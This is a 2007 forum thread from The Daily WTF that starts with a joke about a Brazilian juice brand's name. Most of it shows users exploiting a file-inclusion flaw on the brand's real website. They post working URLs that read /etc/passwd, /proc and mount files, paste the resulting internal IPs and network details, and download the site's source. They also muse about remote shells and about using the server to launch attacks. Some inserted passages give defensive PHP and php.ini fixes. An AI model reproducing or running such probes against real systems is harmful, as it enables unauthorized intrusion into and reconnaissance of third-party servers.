The Daily WTF: Curious Perversions in Information Technology

Sukest's Suks Juice

Last post 04-14-2007 6:37 PM by plazmo. 30 replies.
Page 1 of 1 (31 items)
  • 04-11-2007 11:57 AM

    • Tatiano
    • Not Ranked
    • Joined on 09-03-2006
    • Brasil
    • Posts 59

    Sukest's Suks Juice

    I saw this juice while shopping some time ago...

    Guess what!

    it doesn't suck...

    http://www.sukest.com.br/template.php?pagina=produtos.php&product=578&category=552&screen=0&search=


     Sucks

  • 04-11-2007 2:10 PM In reply to

    Re: Sukest's Suks Juice

    Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

     

    What Would Brian Boitano Do?
  • 04-11-2007 2:38 PM In reply to

    Re: Sukest's Suks Juice

    cconroy:

    Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

    Probably a coincidence. It's Portuguese, but it's a brand name, so I'm not sure that it could mean something similar to "sucks" in English.

  • 04-11-2007 2:54 PM In reply to

    Re: Sukest's Suks Juice

    haha, the real wtf is their site. I found a way to download what seems like any file off their server
  • 04-11-2007 3:04 PM In reply to

    Re: Sukest's Suks Juice

    If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

    http://www.pschitt.fr/

     

  • 04-11-2007 3:25 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    This ad is for the Brazilian (and maybe Latin American) market.

    In Portuguese, "suks" does not have any meaning, but it sounds like "suco" (juice).
     


    To err is human, but to really mess things up, you need a computer.
  • 04-11-2007 3:39 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    newfweiler:

    If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

    http://www.pschitt.fr/

    Heh. I love the "Pschitt! Yourself" option on the main site.

    To err is human, but to really mess things up, you need a computer.
  • 04-11-2007 4:56 PM In reply to

    • rbowes
    • Top 150 Contributor
    • Joined on 02-09-2007
    • Winnipeg, MB
    • Posts 412

    Re: Sukest's Suks Juice

    plazmo:
    haha, the real wtf is there site. I found a way to download what seems like any file off their server

    Ahh, that classic. Once I figured out that "pagina" doesn't mean what I thought it did, it was easy!

    http://www.sukest.com.br/template.php?pagina=/etc/passwd&product=578&category=552&screen=0&search= 

    Luckily, their webserver isn't running as r00t!  

    Bets on whether this allows remote file inclusion? *doesn't want to try* 

  • 04-11-2007 7:08 PM In reply to

    • kirchhoff
    • Top 500 Contributor
    • Joined on 02-27-2007
    • ECE 280 (Circuit Analysis)
    • Posts 217

    Re: Sukest's Suks Juice

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 

  • 04-11-2007 8:43 PM In reply to

    Re: Sukest's Suks Juice

    kirchhoff:

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 

    try /proc. http://www.sukest.com.br/template.php?pagina=/proc/cpuinfo
    processor	: 0
    vendor_id	: GenuineIntel
    cpu family	: 15
    model		: 6
    model name	: Intel(R) Pentium(R) D CPU 2.80GHz
    stepping	: 4
    cpu MHz		: 2800.416
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 2
    core id		: 0
    cpu cores	: 2
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 6
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
    bogomips	: 5605.42
    
    processor	: 1
    vendor_id	: GenuineIntel
    cpu family	: 15
    model		: 6
    model name	: Intel(R) Pentium(R) D CPU 2.80GHz
    stepping	: 4
    cpu MHz		: 2800.416
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 2
    core id		: 1
    cpu cores	: 2
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 6
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
    bogomips	: 5600.70
    
    http://www.sukest.com.br/template.php?pagina=/etc/mtab
    
    /dev/sda2 / reiserfs rw 0 0
    proc /proc proc rw 0 0
    sysfs /sys sysfs rw 0 0
    file:/home/apache /mnt/apache nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
    file:/home/firstsite /mnt/firstsite nfs rw,addr=10.174.141.105 0 0
    file:/home/sites /mnt/sites nfs rw,addr=10.174.141.105 0 0
    file:/home/aceite /mnt/aceite nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
    file:/home/tomcat4/webapps /opt/tomcat4/webapps nfs rw,addr=10.174.141.105 0 0
    file:/home/web /mnt/web nfs rw,addr=10.174.141.105 0 0
    file:/home/web/producao/java/tomcat5 /opt/tomcat5/webapps nfs rw,addr=10.174.141.105 0 0
    file:/home/web/producao/java/tomcat3 /opt/tomcat3/webapps nfs rw,addr=10.174.141.105 0 0
    
    http://www.sukest.com.br/template.php?pagina=/proc/uptime
    8473928.52 6995444.24
    http://www.sukest.com.br/template.php?pagina=/proc/net/arp
    IP address       HW type     Flags       HW address            Mask     Device
    10.174.141.2     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
    10.174.141.105   0x1         0x2         00:08:54:28:E5:2F     *        eth0
    10.174.141.5     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
    10.174.141.93    0x1         0x2         00:60:08:3A:11:EE     *        eth0
    10.0.0.20        0x1         0x2         00:01:03:DD:1B:9F     *        eth0
    10.174.141.110   0x1         0x2         00:50:04:81:5F:96     *        eth0
    10.174.141.91    0x1         0x2         00:60:08:3A:11:EE     *        eth0
    
    http://www.sukest.com.br/template.php?pagina=/proc/net/dev
     Inter-|   Receive                                                |  Transmit
     face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
      eth0:871871887 680310827   15    0    0    15          0         0 2100491378 743447569    0    0    0     0       0          0
        lo:  628831    7990    0    0    0     0          0         0   628831    7990    0    0    0     0       0          0
    
    If anyone is really adventurous, go try and open some logs or a httpd.conf somewhere.
    :(){ :|:& };:
  • 04-12-2007 12:17 AM In reply to

    Re: Sukest's Suks Juice

    http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

  • 04-12-2007 2:06 AM In reply to

    • Daniel15
    • Not Ranked
    • Joined on 01-27-2007
    • Mountain View, CA
    • Posts 266

    Re: Sukest's Suks Juice

    plazmo:

    http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

    That's definitely a WTF :o
  • 04-12-2007 9:29 AM In reply to

    • KluZz
    • Not Ranked
    • Joined on 01-09-2007
    • Posts 1

    Re: Sukest's Suks Juice

    purely out of interest, do you guys know what a honeypot system is? :)
  • 04-12-2007 10:23 AM In reply to

    Re: Sukest's Suks Juice

    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)
    Ooh, look. A shiny <font>. cute. :)
    :(){ :|:& };:
  • 04-12-2007 10:52 AM In reply to

    Re: Sukest's Suks Juice

    The script is clearly running on the web server.

    You would face a honeypot trap when you try to sneak from one server to another, e.g. compromise the server and try to access another one on the network from it.

    I could be wrong, but this one is certainly not a honeypot.

  • 04-12-2007 11:10 AM In reply to

    Re: Sukest's Suks Juice

    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)

     

    It's a server set up with an intentional flaw to trap attackers.

    I've seen a few in the past, but I don't think this is one.

  • 04-12-2007 11:10 AM In reply to

    Re: Sukest's Suks Juice

    At least the webserver doesn't run as root ;)
    It's like they thought Unicode support might be a good idea but then realised doing it right would be hard, so they made wchar_t completely useless then sat back and ate donuts.

    /Vanders
  • 04-12-2007 11:11 AM In reply to

    Re: Sukest's Suks Juice

    fennec:
    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)
    Ooh, look. A shiny <font>. cute. :)

    There was that one person -- still may be around, actually -- that would embiggen and bold the first letter of all of his/her posts, in what I suppose was intended to be "ye olde manuscript" style.

  • 04-12-2007 12:19 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    kirchhoff:

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 


    http://www.sukest.com.br/template.php?pagina=/proc/version&category=552&screen=0&search=


    Linux version 2.6.19.1-POWER_EDGE_840 (root@web1) (gcc version 3.4.6) #3 SMP Tue Jan 2 14:14:51 BRST 2007

    To err is human, but to really mess things up, you need a computer.
  • 04-12-2007 4:07 PM In reply to

    Re: Sukest's Suks Juice

    Oddly, it won't let you view /dev/zero, /dev/random, or /dev/urandom.
  • 04-12-2007 7:15 PM In reply to

    • phaedrus
    • Top 500 Contributor
    • Joined on 03-19-2007
    • Seattle Ex-Pat living in the Bay Area
    • Posts 111

    Re: Sukest's Suks Juice

    Awesome. 
    All men are frauds. The only difference between them is that some admit it. I myself deny it.
    -- H. L. Mencken
  • 04-13-2007 4:46 AM In reply to

    • Kemp
    • Top 500 Contributor
    • Joined on 09-21-2006
    • Posts 126

    Re: Sukest's Suks Juice

    a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

    Session ID hardcoded into the php source? This is madness.

  • 04-13-2007 8:15 AM In reply to

    Re: Sukest's Suks Juice

    Kemp:

    a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

    Session ID hardcoded into the php source? This is madness.

    An artifact from slightly incorrect usage of session vars. 


    In complex analysis, a meromorphic function on an open subset D of the complex plane is a function that is holomorphic on all D except a set of isolated points
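    A session id showing up inside an href is what PHP's URL-rewriting fallback produces: with session.use_trans_sid enabled, PHP appends PHPSESSID to links whenever the session cookie is not available, and with URL ids accepted the server will adopt whatever id a link carries. Whether that is what produced the line Kemp quoted is an assumption; the fragment below is an added example of the php.ini directives that prevent it, not configuration taken from the site in this thread.

```ini
; Added example: php.ini session directives, not configuration from the site
; discussed in this thread.

; Weak: PHP rewrites links to carry ?PHPSESSID=... when no cookie is sent,
; and it accepts an id arriving in the URL, so ids end up in page source,
; referers and proxy logs.
; session.use_trans_sid = 1
; session.use_only_cookies = 0

; Corrected: the id travels only in a cookie, PHP never rewrites URLs, and
; an id the server did not itself issue is replaced instead of adopted
; (use_strict_mode needs PHP 5.5.2 or later).
session.use_trans_sid = 0
session.use_only_cookies = 1
session.use_strict_mode = 1
session.cookie_httponly = 1
session.cookie_secure = 1
```

    With use_only_cookies set, a link that still carries a PHPSESSID parameter is ignored by session_start(), so a stale id pasted into a page does nothing more than clutter the URL.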

  • 04-13-2007 3:03 PM In reply to

    Re: Sukest's Suks Juice

    Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files. This seems to me that one could write a php file that prints out php text, put it somewhere public, and have this site read it in. You now have unfettered access to the system (probably quite easy to write a remote shell) and can I'm sure quite easily get root access.

    I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...
     

  • 04-13-2007 3:58 PM In reply to

    • kirchhoff
    • Top 500 Contributor
    • Joined on 02-27-2007
    • ECE 280 (Circuit Analysis)
    • Posts 217

    Re: Sukest's Suks Juice

    The hosting provider is using privilege separation. The site is running as a virtual-host specific user without access to any really interesting files. You can certainly deface the site, but that's not very useful. It might be neat to launch attacks from it though, or configure it to run a Tor exit node.
  • 04-14-2007 4:10 AM In reply to

    • Daniel15
    • Not Ranked
    • Joined on 01-27-2007
    • Mountain View, CA
    • Posts 266

    Re: Sukest's Suks Juice

    JamesKilton:

    Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files.


    Sure, it's used in an include() statement, but file_exists() is used to check if the file exists. Since this fails for remote files, no remote inclusion can be done.
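    JamesKilton's and Daniel15's posts come down to the same defect: template.php hands the pagina parameter to include(), and a file_exists() check only rules out remote URLs, not local reads such as /etc/passwd or /proc/cpuinfo that the thread has already shown. The following is an added example of how a page loader can be written so the parameter never reaches the filesystem as a path at all; it is not code from template.php or from the site, and the page map, the pages/ directory and the resolve_page() helper are assumptions for illustration.

```php
<?php
// Added example (not Sukest's template.php): a page loader that replaces
// include($_GET['pagina']) with an allowlist lookup, so neither local
// paths such as /etc/passwd nor remote URLs can ever reach include().

declare(strict_types=1);

// The map is the whole policy: a request is a key into it, never a path.
// Keys and file names are assumed for illustration.
const PAGES = [
    'produtos'     => 'produtos.php',
    'arearestrita' => 'arearestrita.htm',
];

// Assumed location of the page fragments, separate from the web root.
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Resolve a user-supplied page key to an absolute path inside PAGE_DIR,
 * or return null if the request must be refused.
 */
function resolve_page(string $requested): ?string
{
    // 1. Anything not in the map ("/etc/passwd", "../x", "http://...")
    //    is rejected before the filesystem is touched; file_exists() is
    //    never consulted on user input.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }

    // 2. Canonicalise and confirm the result still lies under PAGE_DIR.
    //    The allowlist already guarantees this; the check catches a future
    //    edit that puts a traversal or absolute path into PAGES.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Request handling: a non-string (?pagina[]=x) or unknown key gets a 404
// rather than a file read, and the original value is never echoed back.
$pagina = $_GET['pagina'] ?? 'produtos';
$path = is_string($pagina) ? resolve_page($pagina) : null;
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

    The point of the lookup-then-realpath shape is that the two checks fail independently: the map stops user input from naming a file, and the prefix comparison stops a mistaken map entry from naming one outside the page directory. A rejected request is also easy to alert on, since the only way to produce a 404 here is to send a key that was never linked from the site.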
  • 04-14-2007 12:22 PM In reply to

    Re: Sukest's Suks Juice

    Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?
    Begging the question since 2007.
  • 04-14-2007 1:05 PM In reply to

    Re: Sukest's Suks Juice

    The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.
    Begging the question since 2007.
  • 04-14-2007 2:40 PM In reply to

    Re: Sukest's Suks Juice

    JamesKilton:

    I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...

    From their own root account. 

  • 04-14-2007 4:50 PM In reply to

    • iwpg
    • Top 500 Contributor
    • Joined on 05-24-2006
    • Posts 258

    Re: Sukest's Suks Juice

    Faxmachinen:
    Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?

    Heh.  Maybe the code was released under the Affero Licence

  • 04-14-2007 6:37 PM In reply to

    Re: Sukest's Suks Juice

    Faxmachinen:
    The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.

    Yeah, I saw that, but at least they didn't store the passwords as plain text.
